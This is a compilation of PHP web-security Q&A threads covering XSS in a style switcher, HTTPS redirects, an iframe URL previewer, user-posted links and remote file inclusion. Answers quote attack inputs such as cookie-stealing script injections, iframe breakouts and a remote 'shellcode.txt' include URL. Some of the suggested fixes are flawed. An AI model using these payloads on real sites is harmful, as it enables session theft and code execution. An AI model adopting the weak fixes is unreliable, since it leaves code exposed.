i want to use a css style switcher on a live server. i've been asking on irc and a guy said there is a big XSS hole. i don't know too much about XSS vulnerabilities. I hope someone can help me out to secure it!
i used this tutorial for the css switcher:
http://net.tutsplus.com/tutorials/javascript-ajax/jquery-style-switcher/
and the guy said the vulnerability is on the PHP side of the script!
Any tips would be highly appreciated!
Also if someone could re-make the whole script in a more secure way because - please do many ppl from net.tutsplus.com who use it would thank you!
The problem I see on this script is that there is a value that comes from the client $_COOKIE['style'] and is directly outputed in the page.
<link id="stylesheet" type="text/css" href="css/<?php echo $style ?>.css" rel="stylesheet" />
The cookie value is possible to highjack by external website in some particular condition. Also that cookie value is also set in the style-switcher.php without any filtering based on a GET parameter.
What I recommand you is to limit the possibility to style you want to be available.
Example :
<?php
if(!empty($_COOKIE['style'])) $style = $_COOKIE['style'];
else $style = 'day';
// List of possible theme //
$listStyle = array('day', 'night', 'foobar');
if (!in_array($style, $listStyle)) {
$style = $listStyle[0];
}
?>
href="css/<?php echo $style ?>.css"
Every time you output a text string to HTML, you must use htmlspecialchars() on the value, otherwise out-of-band characters like <, & or in this case " will break out of the context (attribute value) and allow an attacker to insert arbitrary HTML into the page, including JavaScript content.
This in an HTML-injection hole, and you should fix it. However it is not yet directly an XSS vulnerability, because the source of $style is $_COOKIE. That cookie must have been set by your scripts, or by the user himself; unlike $_GET and $_POST values, it cannot be set on a user's browser by a third party. It only becomes a vulnerability if you allow a third party to cause the user's cookies to be set to arbitrary values.
However, style-switcher.php does exactly that:
$style = $_GET['style'];
setcookie("style", $style, time()+604800);
with no checking to see that $style is an approved value, and no checking that the request to switch styles has been made by the user himself and not an arbitrary link on a third-party site: that is, it is vulnerable to XSRF. Say an attacker included a link or img src in a page visited by the user, pointing to:
http://www.example.com/style-switcher.php?style="><script>steal(document.cookie);</script>
that script will now be run each time the user loads a page from your site. (Technically, the ", ; and </> characters in this example need to be URL-encoded with %, but I've left it raw here for readability.)
(Also, you should really be using a POST form for this, since it has a side-effect action.)
What's worse, the same script contains a direct echoed injection which most definitely is XSS-vulnerable:
if(isset($_GET['js'])) {
echo $style;
}
This hole allows arbitrary content injection. Although normally you will be expecting this script with js to be called by an XMLHttpRequest (via jQuery get()), there is nothing stopping an attacker calling it by linking a user to a URL like:
http://www.example.com/style-switcher.php?style=<script>steal(document.cookie);</script>&js=on
and in response they'll get their <script> echoed back in a page that, with no Content-Type header explicitly set, will default to text/html, causing JavaScript of the attacker's choosing to be executed in your site's security context.
header("Location: ".$_SERVER['HTTP_REFERER']);
This is not a good idea for other reasons. The Referer header is not guaranteed to make its way to your server. To ensure this works, pass the URL-to-return-to in a parameter to the script.
I probably wouldn't bother with the PHP side to this. I'd just set the relevant cookie from JavaScript and location.reload() or manipulate the stylesheet DOM to update. The PHP script is an attempt to make the switcher work without JavaScript, but unless you can be bothered to implement it properly and securely with XSRF protection, it is a liability.
If you include your alternative style sheets as <link rel="alternate stylesheet"> you'll be giving stylesheet switching support to users without JavaScript anyway.
Subject your app to a comprehensive security test to see where the holes are. Try Skipfish.
Related
I want to detect whether or not a user is viewing a secure page and redirect if not (for logging in).
However, my site travels through a proxy before I see the server variables and the proxy (right now) is telling me that $_SERVER['HTTPS'] is 'on' when the URI clearly indicates otherwise. It also shows 'on' when the user is navigating 'securely'.
Navigating through http:// and https:// both output that $_SERVER['SERVER_PORT'] = 443.
I don't have the ability to make any changes to the proxy so I want to know:
Does PHP have any other options for me to detect the truth or...
Am I stuck to resort to JavaScript's mechanisms for detection and redirection.
I mined this question for ideas but they mostly revolve around the $_SERVER['HTTPS'] variable being trustworthy. Bah!
It appears that this question is experiencing at least something similar, but s/he was able to resolve it by adapting an apache solution.
Are there any other PHP SERVER variables or tricks available to detect what the user's URI begins with? The only difference between the $_SERVER variables when my site is viewed http versus https are the following:
_FCGI_X_PIPE_ (appears random)
HTTP_COOKIE (sto-id-47873 is included in the non-secure version but I did not put it there)
REMOTE_ADDR (This and the next two keep changing inexplicably!)
REMOTE_HOST
REMOTE_PORT ('proxy people', why are you continually changing this?)
Are any of these items strong enough to put one's weight upon without it splintering and causing pain later? Perhaps I shouldn't trust anything as filtered through the proxy since it could change at any given time.
Here is my plan to use JavaScript for this purpose; is it the best I have?
function confirmSSL() {
if(location.protocol != "https:") {
var locale = location.href;
locale = locale.replace(/http:\/\//,"https://");
location.replace(locale);
}
}
<body onLoad="confirmSSL()">...
I think if the user has JavaScript disabled in my community, then they hopefully know what they are doing. They should be able to manually get themselves into a secure zone. What sort of <noscript> suggestions would be commonplace / good practice? Something like this, perhaps?:
<noscript>Navigate using https://blah.more.egg/fake to protect your information.</noscript>
PHP solutions that work (with good explanation) will be given preference for the correct answer. Feel free to submit a better JavaScript implementation or link to one.
Many thanks!
Although already partially discussed in the question's comments, I'll summarize some suggestions concerning the redirection logic in JavaScript:
Generally using window.location instead of location is advisable, an explanation can be found here.
Regex seems like a bit of an overkill for a simple replacement of the protocol.
The redirection logic should be executed as soon as possible, because in the event of redirection, every additional document processing is unnecessary.
Browsers with JavaScript disabled should at least show a notification prompting the user to switch to https.
I suggest using the following code (adopted from here), which is short and efficient:
<head>
<script type="text/javascript">
if (window.location.protocol != "https:") {
window.location.href = "https:" + window.location.href.substring(window.location.protocol.length);
}
</script>
...
</head>
<body>
...
<noscript>Please click here to use a secure connection!</noscript>
...
Just use the client-side approach. If your proxy is non-configurable, then that option is out. Detecting and redirecting via js is fine.
There is also a way to achieve the redirection without client side javascript. This method can be especially helpful, if JavaScript is disabled in the client's browser.
The steps are pure PHP and pretty simple:
Start a session
If it's a fresh session, redirect to the https location
If the session isn't new, it can be assumed, that the user has been redirected
Example code:
<?php
session_start();
if( !isset($_SESSION['runningOnHttps']) ) {
$_SESSION['runningOnHttps'] = true;
header('Location: https://my-cool-secure-site.com');
}
?>
Naturally, you could restrain this functionality to those browsers with JavaScript disabled in order to create a kind of 'hybrid mode': Whenever there is a new session with a non-JS browser, make a request to some kind of callback script that notifies the server to send a location header:
some_landingpage.php sends an initial <noscript> containing a hidden iframe, which will load redirect.php:
if( !isset($_SESSION['checkWasMade']) ) {
$_SESSION['checkWasMade'] = true;
echo '<noscript>
<iframe src="redirect.php" style="visibility: hidden; position: absolute; left: -9000px;"></iframe>
</noscript>';
}
A request to redirect.php will let you know, that JavaScript is disabled and give you the chance to force redirection by sending a Location header (see above) with the next actual request.
As a matter of course, this method will only work reliably, if the protocol won't change (magically?) during one session.
UPDATE:
All of the above-mentioned method for handling non-JavaScript user agents could be rendered moot by an even neater approach:
I just learned, that <noscript> can also be included inside the <head>, which allows one to just redirect via <meta> tags.
Hence, some_landingpage.php could send an initial meta-refresh inside <noscript>:
// The following echo must appear inside the html head
if( !isset($_SESSION['checkWasMade']) ) {
$_SESSION['checkWasMade'] = true;
echo '<noscript>
<meta HTTP-EQUIV="REFRESH" content="0; url=https://my-cool-secure-site.com">
</noscript>';
}
I am creating a very basic iPhone simulator and what I want to do is just have it in one location, and then any site that we have and want to put it on, we would just call it using: http://www.example.com/iphone-test.php?url=http://www.example.com/mobile/
Is there anything I need to look out for that could be un-safe? There is no database involved or anything, but just in case someone wanted to mess around and put some stuff in the URL, what are some things I can do to help make this a little more safe?
Here is my code:
<?php
if(isset($_GET['url'])) {
$url = $_GET['url'];
?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>iPhone Test</title>
<style type="text/css">
#iphone {
background:url(iPhone.png) no-repeat;
width:368px; height:706px;
position:relative;
overflow:hidden;
}
#iphone iframe {
position:absolute;
left:30px;
top:143px;
border:0;overflow:hidden;
}
</style>
</head>
<body>
<div id="iphone">
<iframe src="<?=$url;?>" width="307" height="443"><p>Your Browser does not support iFrames.</p></iframe>
</div>
</body>
</html>
<?php
}
?>
Edit: Thanks for all of your help. I did some research and here is what I have so far:
<?php
include_once 'filter.php';
$filter = new InputFilter();
if(isset($_GET['url'])) {
if (filter_var($_GET['url'], FILTER_VALIDATE_URL)) {
$url = $filter->process($_GET['url']);
?>
Source: http://oozman.com/php-tutorials/avoid-cross-site-scripting-attacks-in-php/
Class: http://www.phpclasses.org/browse/file/8941.html
What do you think?
You should use PHP's filter_var to check it's valid...
if (isset($_GET['url'])) {
if (filter_var($_GET['url'], FILTER_VALIDATE_URL)) {
$url = $_GET['url'];
}
}
If this page is accessible for anyone to access then you are opening yourself up to XSS and Phishing redirects. For example, try adding this to your URL params:
?url="></iframe><script>alert(123)</script>
In Firefox 6.02 that fires off the alert. Which means that any JS could be fired and used to redirect users who think they are visiting your site. Or it could be used to steal cookies that are not marked HTTPOnly.
This can be mitigated by encoding for HTML attributes. Which is described here from OWASP:
Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the &#xHH; format (or a named entity if available) to prevent switching out of the attribute. The reason this rule is so broad is that developers frequently leave attributes unquoted. Properly quoted attributes can only be escaped with the corresponding quote. Unquoted attributes can be broken out of with many characters, including [space] % * + , - / ; < = > ^ and |.
Reference: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#RULE_.232_-_Attribute_Escape_Before_Inserting_Untrusted_Data_into_HTML_Common_Attributes
Now, for your other issue that the above will nto address. If you allow just any arbitrary URL to be entered, then there is nothing stopping someone from doing something like this:
?url=http://myevilsite.com/redirect.php
And have that page redirect the user:
window.top.location.href = "http://www.site.com";
The only thing you can do about that is to use a white list of acceptable URLs.
The request method does not provide any securiy features, please see this answer
You need to be 100% sure beyond doubt that your code will not hijack that frame with javascript or lead the person to a malicious domain, or lead to a request form on your page that does something they don't want.
You can see some examples out here of that:
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<iframe src=http://ha.ckers.org/scriptlet.html"></IFRAME>
You could have the person lead to post something as well...
Anyway, I can steal all your cookies, or trick the user into thinking they're still on your site but really be on mine where I get all their precious information.
Just stop, before you go any further you need to know what your doing, and you start by reading this.
You are vulnerable to cross site scripting.
All someone has to do is include "></iframe><script>EEEEVVvvvillll!!!! in the URL, or use a non-HTTP/HTTPS URI.
Here is a list for the security concerns involved here..
IFrames security summary
Wednesday, 24 October 2007 I’ve decided to collect the various proof
of concepts I’ve done and summarise why iframes are a security risk.
Here are the top reasons:-
Browser cross domain exploits
Description:- Because you can embed another web site inside your page,
you can exploit that page and perform actions as that user and doing
anything on a chosen web site.
Proof of concept:- Safari beta 3.03 zero day
XSS/CSRF reflection attacks
Description:- Using iframes embedded onto a compromised site an
attacker then can reflect attacks to other servers therefore making
attacks difficult to trace and having a focal point to conduct
attacks.
Proof of concept:- None available for this type of attack as it would
be difficult to show the method without actually conducting an attack.
CSS and iframes can scan your LAN from the internet!
Description:- By exploiting features in CSS and using iframes to check
if the default IP address exists, it’s possible to get your network
address range quite easily providing the network device uses the
default out of the box IP address.
Proof of concept:- CSS LAN scanner
LAN scanning with Javascript and iframes
Description:- Using a similar method as above it is possible to gain
your LAN information using Javascript.
Proof of concept:- Javascript LAN scanner
CSS iframe overlays
Description:- Iframes can be embedded inside each other in Firefox and
you can alter their appearance to create seamless overlays with any
site. This would make it very difficult for a user to know which site
they are interacting with and fool them to performing an action.
Proof of concept:- Verisign OpenID exploit (now fixed)
URL redirection
Description:- Iframes also allow you to perform redirection so you can
have access to URLs which normally wouldn’t be accessible. In the
delicious example, the POC redirects from delicious/home to your
account bookmarks and then uses CSS overlays to display your first
bookmark. Firefox and a delicious account are required for the POC.
Proof of concept:- Delicious CSS overlay/Redirection
Original here
You could make it a lot safer by acting like a proxy, load up the requested URL in PHP, strip everything out of the HTML (javascript etc) and then display it in the iframe pointed at a webpage on your server
Simply use strip_tags(), to void any evil script entry:
$url = strip_tags($_GET['url'])
I have a situation like this.
<php>
<redirect the page >
<exit>
<javascript>
<redirect the page again>
I want to have javascript that basicall disables the PHP redirect. So if Javascript is enabled on the browser, the javascript redirect will work, if it disable, the PHP redirect will work. Should I just enclose the PHP code in span and make it invisible? Any ideas?
Addition ok this is not a simple redirect. the form authentication is rather odd. Register.php -> register_submit.php -> Was there an error -> yes go back to register.php (everything is javascript at this point). What I have added is PHP authentication as well so if I see javascript is not enabled, I take the user to register.php *after it does the regular checking of fields *.
PHP is a server-side technology. By the time Javascript even sees what's happened, it's too late.
Short answer, JS can't intercept/block PHP (as long as PHP is being called first).
Order of events:
Client requests page
PHP executes and generates output of page
Browser receives output
Browser begins parsing what was sent by what PHP already spit out.
Remove your PHP redirection and add this in your <head>:
<noscript>
<meta http-equiv="refresh" content="0; http://www.example.com/1" />
</noscript>
<script>
window.location = 'http://www.example.com/2';
</script>
This will redirect to http://www.example.com/1 when javascript is disabled, and to http://www.example.com/2 when it's enabled.
PHP code is executed on the server-side, while JS is client-side. So with that structure the PHP will kick in before the JS is executed. If you want JS to control PHP you need to make use of AJAX to control it.
Also enclosing PHP code in a "span" won't have any effect.
Javascript and PHP do not directly interact (exceptions apply, don't worry about them now :D). The best way to implement this type of interaction between these two disparate languages is to use the query string or cookies.
I think there may be some confusion here about when and how PHP is executed as opposed to when and how javascript is executed. Think of PHP as the factory - the goods are physically produced there. Think of your server as the loading dock, the internet as the shipping company. Your browser is the store, HTML is the shelves; Javascript is the window decorations on the store that sells the merchandise. The window decorations have no affect on the production, the factory can make some window decorations, but it doesn't use them, it just ships them right along with the merchandise for the store to use. PHP is the factory, javascript is the decoration. There are some problems with taking this analogy too literally, but there it is in a nutshell.
You can make the PHP redirect conditional on the presence or absence of a specific query string variable:
<?php
// redirect if $_GET['no_redirect'] is NOT set. Reverse the true/false to invert this rule
$do_redirect = (isset($_GET['no_redirect']) === false ? true : false);
// perform the redirect, if required
if ($do_redirect === false)
header('Location:http://mydomain.com');
?>
Javascript:
window.location = 'http://mydomain.com/?no_redirect=1';
EDIT If you're trying to detect if javascript is enabled, then the best way is for javascript to set a cookie if it is enabled. PHP can then check for this cookie, and if it isn't found then you'll know that javascript didn't get a chance to set it, so it must be disabled (or the user edited their cookies).
Take a look at some code snippets for dealing with cookies in javascript, and check out the documentation for dealing with cookies in PHP.
I want to allow users of my site to post urls. These urls would then be rendered on the site in the href attributes of a tags. Basically, user A posts a url, my site displays it on the page as an tag, then user B clicks it to see pictures of kittens.
I want to prevent javascript execution and xss attacks, and ensure there are no malformed urls in the output I generate.
Example: User A posts a malformed url, supposedly to pictures of kittens. My site tries to generate an tag from user A's data, then user B clicks the resulting link. User A has actually posted a malformed url which adds a javascript "onclick" event in the to send the victim's cookies to another site.
So I want to only allow correctly formed urls, and block out anything other than http/https protocols. Since I'm not allowing anything here which doesn't look like a url, and the user is not providing me html, it should be pretty simple to check by parsing and reforming the url.
My thinking is that parse_url should fail with an error on malformed urls, or it replaces illegal characters with '_'. I can check the separated parts of the url for allowed protocols as well. Then by constructing a url using http_build_url, I take the parts separated by parse_url and put them back together into a url which is known to be correctly formed. So by breaking them down this way first, I can give the user an error message when it fails instead of putting a sanitized broken url in my page.
The question is, will this prevent xss attacks from doing evil if a user clicks the link? Does the parsed and rebuilt url need further escaping? Is there a better way to do this? Shouldn't this be a solved problem by now with functions in the standard php libraries?
I really don't want to write a parser myself and I'm not going to even consider regular expressions.
Thanks!
What you need to do is just escape content properly when building your html. this means that when a value has a " in it, you build your html with "
Protecting against XSS isn't primarily about validating URL's it's about proper escaping. (although you probably want to be sure that it's a http: or https: link)
For a more detailed list of what to escape when building html strings (ie: the href attribute) see HTML, URL and Javascript Escaping
No, parse_url is not meant to be a URL validator.
You can use filter_var for this:
filter_var($someURL, FILTER_VALIDATE_URL);
So, in PHP, you would use something like:
<?php
$userlink = "http://google.com";
$newlink = htmlentities($userlink);
$link = "$newlink";
?>
Depending on a few other things, you might just validate the URL by checking if it points to any content. Here is an example:
figure 1
<?php
// URL to test
// $url = "";
$content = file_get_contents($url);
if(!empty($content)){
echo "Success:<br /><iframe src=\"$url\" style=\"height:400px; width:400px; margin:0px auto;\"></iframe>";
}else{
echo "Failed: Nothing exists at this url.";
}
?>
Curl is another option. With cURL you can just return http headers then check the error code it returns. ie Error 404 = page not found, 200 = OK, 201 = Created, 202 = Accepted, etc etc
Good luck!
~John
http://iluvjohn.com/
My website was recently attacked by, what seemed to me as, an innocent code:
<?php
if ( isset( $ _GET['page'] ) ) {
include( $ _GET['page'] . ".php" );
} else {
include("home.php");
}
?>
There where no SQL calls, so I wasn't afraid for SQL Injection. But, apparently, SQL isn't the only kind of injection.
This website has an explanation and a few examples of avoiding code injection: http://www.theserverpages.com/articles/webmasters/php/security/Code_Injection_Vulnerabilities_Explained.html
How would you protect this code from code injection?
Use a whitelist and make sure the page is in the whitelist:
$whitelist = array('home', 'page');
if (in_array($_GET['page'], $whitelist)) {
include($_GET['page'].'.php');
} else {
include('home.php');
}
Another way to sanitize the input is to make sure that only allowed characters (no "/", ".", ":", ...) are in it. However don't use a blacklist for bad characters, but a whitelist for allowed characters:
$page = preg_replace('[^a-zA-Z0-9]', '', $page);
... followed by a file_exists.
That way you can make sure that only scripts you want to be executed are executed (for example this would rule out a "blabla.inc.php", because "." is not allowed).
Note: This is kind of a "hack", because then the user could execute "h.o.m.e" and it would give the "home" page, because all it does is removing all prohibited characters. It's not intended to stop "smartasses" who want to cute stuff with your page, but it will stop people doing really bad things.
BTW: Another thing you could do in you .htaccess file is to prevent obvious attack attempts:
RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /–http– [F,NC]
RewriteRule http: /–http– [F,NC]
That way all page accesses with "http:" url (and query string) result in an "Forbidden" error message, not even reaching the php script. That results in less server load.
However keep in mind that no "http" is allowed in the query string. You website might MIGHT require it in some cases (maybe when filling out a form).
BTW: If you can read german: I also have a blog post on that topic.
The #1 rule when accepting user input is always sanitize it. Here, you're not sanitizing your page GET variable before you're passing it into include. You should perform a basic check to see if the file exists on your server before you include it.
Pek, there are many things to worry about an addition to sql injection, or even different types of code injection. Now might be a good time to look a little further into web application security in general.
From a previous question on moving from desktop to web development, I wrote:
The OWASP Guide to Building Secure Web Applications and Web Services should be compulsory reading for any web developer that wishes to take security seriously (which should be all web developers). There are many principles to follow that help with the mindset required when thinking about security.
If reading a big fat document is not for you, then have a look at the video of the seminar Mike Andrews gave at Google a couple years back about How To Break Web Software.
I'm assuming you deal with files in the same directory:
<?php
if (isset($_GET['page']) && !empty($_GET['page'])) {
$page = urldecode($_GET['page']);
$page = basename($page);
$file = dirname(__FILE__) . "/{$page}.php";
if (!file_exists($file)) {
$file = dirname(__FILE__) . '/home.php';
}
} else {
$file = dirname(__FILE__) . '/home.php';
}
include $file;
?>
This is not too pretty, but should fix your issue.
pek, for a short term fix apply one of the solutions suggested by other users. For a mid to long term plan you should consider migrating to one of existing web frameworks. They handle all low-level stuff like routing and files inclusion in reliable, secure way, so you can focus on core functionalities.
Do not reinvent the wheel. Use a framework. Any of them is better than none. The initial time investment in learning it pays back almost instantly.
Some good answers so far, also worth pointing out a couple of PHP specifics:
The file open functions use wrappers to support different protocols. This includes the ability to open files over a local windows network, HTTP and FTP, amongst others. Thus in a default configuration, the code in the original question can easily be used to open any arbitrary file on the internet and beyond; including, of course, all files on the server's local disks (that the webbserver user may read). /etc/passwd is always a fun one.
Safe mode and open_basedir can be used to restrict files outside of a specific directory from being accessed.
Also useful is the config setting allow_url_fopen, which can disable URL access to files, when using the file open functions. ini-set can be used to set and unset this value at runtime.
These are all nice fall-back safety guards, but please use a whitelist for file inclusion.
I know this is a very old post and I expect you don't need an answer anymore, but I still miss a very important aspect imho and I like it to share for other people reading this post. In your code to include a file based on the value of a variable, you make a direct link between the value of a field and the requested result (page becomes page.php). I think it is better to avoid that.
There is a difference between the request for some page and the delivery of that page. If you make this distinction you can make use of nice urls, which are very user and SEO friendly. Instead of a field value like 'page' you could make an URL like 'Spinoza-Ethica'. That is a key in a whitelist or a primary key in a table from a database and will return a hardcoded filename or value. That method has several advantages besides a normal whitelist:
the back end response is effectively independent from the front end request. If you want to set up your back end system differently, you do not have to change anything on the front end.
Always make sure you end with hardcoded filenames or an equivalent from the database (preferrabley a return value from a stored procedure), because it is asking for trouble when you make use of the information from the request to build the response.
Because your URLs are independent of the delivery from the back end you will never have to rewrite your URLs in the htAccess file for this kind of change.
The URLs represented to the user are user friendly, informing the user about the content of the document.
Nice URLs are very good for SEO, because search engines are in search of relevant content and when your URL is in line with the content will it get a better rate. At least a better rate then when your content is definitely not in line with your content.
If you do not link directly to a php file, you can translate the nice URL into any other type of request before processing it. That gives the programmer much more flexibility.
You will have to sanitize the request, because you get the information from a standard untrustfull source (the rest of the Web). Using only nice URLs as possible input makes the sanitization process of the URL much simpler, because you can check if the returned URL conforms your own format. Make sure the format of the nice URL does not contain characters that are used extensively in exploits (like ',",<,>,-,&,; etc..).
#pek - That won't work, as your array keys are 0 and 1, not 'home' and 'page'.
This code should do the trick, I believe:
<?php
$whitelist = array(
'home',
'page',
);
if(in_array($_GET['page'], $whitelist)) {
include($_GET['page'] . '.php');
} else {
include('home.php');
}
?>
As you've a whitelist, there shouldn't be a need for file_exists() either.
Think of the URL is in this format:
www.yourwebsite.com/index.php?page=http://malicodes.com/shellcode.txt
If the shellcode.txt runs SQL or PHP injection, then your website will be at risk, right? Do think of this, using a whitelist would be of help.
There is a way to filter all variables to avoid the hacking. You can use PHP IDS or OSE Security Suite to help avoid the hacking. After installing the security suite, you need to activate the suite, here is the guide:
http://www.opensource-excellence.com/shop/ose-security-suite/item/414.html
I would suggest you turn on layer 2 protection, then all POST and GET variables will be filtered especially the one I mentioned, and if there are attacks found, it will report to you immediately/
Safety is always the priority